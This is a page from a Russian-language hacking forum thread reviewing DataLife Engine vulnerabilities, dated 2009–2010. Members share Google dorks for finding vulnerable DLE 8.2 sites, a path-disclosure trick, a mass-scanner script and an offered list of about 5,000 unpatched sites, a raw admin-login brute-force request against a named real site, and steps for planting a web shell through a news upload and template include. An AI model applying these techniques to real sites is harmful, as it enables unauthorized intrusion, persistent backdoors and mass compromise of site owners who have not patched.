ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу [ Обзор уязвимостей DataLife Engine ]
   
Ответ
Страница 10 из 18 « Первая < 6 7 8 9 10 11 12 13 14 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 19.11.2009, 13:30
Аватар для NoEasyWayOut
NoEasyWayOut
Вор привыкший воровать
Регистрация: 01.10.2009
Сообщений: 270
Провел на форуме:
1230670

Репутация: 218
По умолчанию
Какой запрос в гугл вбить дабы найти DLE версии только 8.2?Может есть какой-то признак по урлу, inurl:blabla ?
 
Ответить с цитированием

  #92  
Старый 23.11.2009, 03:20
Аватар для Useroff
Useroff
Участник форума
Регистрация: 23.08.2008
Сообщений: 143
Провел на форуме:
1149516

Репутация: 52
По умолчанию
8.2, раскрытие путей

selected_language = .
admin.php
 
Ответить с цитированием

  #93  
Старый 23.11.2009, 05:25
Аватар для AARON
AARON
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733

Репутация: 46
По умолчанию
Цитата:
Сообщение от NoEasyWayOut  
Какой запрос в гугл вбить дабы найти DLE версии только 8.2?Может есть какой-то признак по урлу, inurl:blabla ?
Можно на images.google.ru вбить

Цитата:
"engine/skins/images/logos.jpg" Datalife Engine
http://images.google.ru/images?hl=ru&source=hp&q=%22engine%2Fskins%2Fimage s%2Flogos.jpg%22+Datalife+Engine&btnG=%D0%9F%D0%BE %D0%B8%D1%81%D0%BA+%D0%BA%D0%B0%D1%80%D1%82%D0%B8% D0%BD%D0%BE%D0%BA&gbv=2&aq=f&oq=
 
Ответить с цитированием

  #94  
Старый 24.11.2009, 22:34
Аватар для slva2000
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию
Выкладываю скрипт поиска DLE 8.2. Многопоточность. CURL.

http://depositfiles.com/files/6s4qs35gb

Берёт данные из файла где собраны любые версии ДЛЕ. Можно иметь просто любые сайты, но признаки поиска ДЛЕ для гугла, например, известны, ему самому, а занчит и вам.

Кому лень возиться со скриптом, вэлком в готовую базу. Примерно 5к версии 8,2. На сегодня половина ещё висят без фиксов. Эх, аккуратнее, и имейте честь и достоинство. Жаль хайда нет.
Последний раз редактировалось slva2000; 24.11.2009 в 22:56..
 
Ответить с цитированием

  #95  
Старый 27.11.2009, 15:19
Аватар для hellorin
hellorin
Новичок
Регистрация: 15.01.2008
Сообщений: 15
Провел на форуме:
203657

Репутация: 0
Отправить сообщение для hellorin с помощью ICQ
По умолчанию
Цитата:
Сообщение от slva2000  
Выкладываю скрипт поиска DLE 8.2. Многопоточность. CURL.

http://depositfiles.com/files/6s4qs35gb

Берёт данные из файла где собраны любые версии ДЛЕ. Можно иметь просто любые сайты, но признаки поиска ДЛЕ для гугла, например, известны, ему самому, а занчит и вам.

Кому лень возиться со скриптом, вэлком в готовую базу. Примерно 5к версии 8,2. На сегодня половина ещё висят без фиксов. Эх, аккуратнее, и имейте честь и достоинство. Жаль хайда нет.
Сцыль с базой обовить бы ...
 
Ответить с цитированием

брутфорс адмики
  #96  
Старый 03.12.2009, 04:48
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию брутфорс адмики
https://forum.antichat.ru/thread153641.html

бага в посылке пакета без кукисов.
http://vipuzor.com/admin.php
Host: vipuzor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.20) Gecko/20091111 Firefox/3.1.3.37
Referer: http://vipuzor.com/admin.php
Content-Type: application/x-www-form-urlencoded
POST
subaction=dologin&username=admin&password=111111
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #97  
Старый 03.12.2009, 22:42
Аватар для zetaap
zetaap
Новичок
Регистрация: 07.05.2009
Сообщений: 3
Провел на форуме:
11846

Репутация: 0
По умолчанию
slva2000 Ссылочки обновите пожалуйста
 
Ответить с цитированием

  #98  
Старый 02.01.2010, 18:47
Аватар для Useroff
Useroff
Участник форума
Регистрация: 23.08.2008
Сообщений: 143
Провел на форуме:
1149516

Репутация: 52
По умолчанию
Цитата:
http://site.com//language/Russian/website.lng
Боян - .htaccess

// будет работать на старых версиях, в новых хтакссесс поумалчанию залит.
H00k
Последний раз редактировалось ZAMUT; 13.01.2010 в 00:07..
 
Ответить с цитированием

  #99  
Старый 10.01.2010, 11:25
Аватар для Balancer
Balancer
Новичок
Регистрация: 09.01.2010
Сообщений: 1
Провел на форуме:
7416

Репутация: 0
По умолчанию
Цитата:
Сообщение от Getozz  
Мой способ самый простой. заливаете шелл через новость. ищете в антивире . и в маин.тпл или другой шаб через админку прописываем. include('/uploads/files/shell.php');

а дальше заходим в шелл и быстренько удаляем файл хтасес из директории шелла(аплоадс и файлс).
дальше удаляеш инклуд из шабла. и с чистой душой радуемся
Проинклудил я main.tpl, а как зайти в шел не понятно. Объясните нубу, пожалуйста!
 
Ответить с цитированием

  #100  
Старый 11.01.2010, 22:50
Аватар для deiv3
deiv3
Новичок
Регистрация: 08.01.2010
Сообщений: 2
Провел на форуме:
10732

Репутация: -5
По умолчанию
Подскажите, что можно сделать, имя доступ к админке в DLE 8.0., если слить базу мешает не выставленные права 777. Есть в этой версии способы залить шелл?
 
Ответить с цитированием
Ответ
Страница 10 из 18 « Первая < 6 7 8 9 10 11 12 13 14 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Сценарии/CMF/СMS 156 07.06.2010 05:01
Обзор уязвимостей в платных CMS ZAMUT Сценарии/CMF/СMS 56 15.04.2010 21:02
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Форумы 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ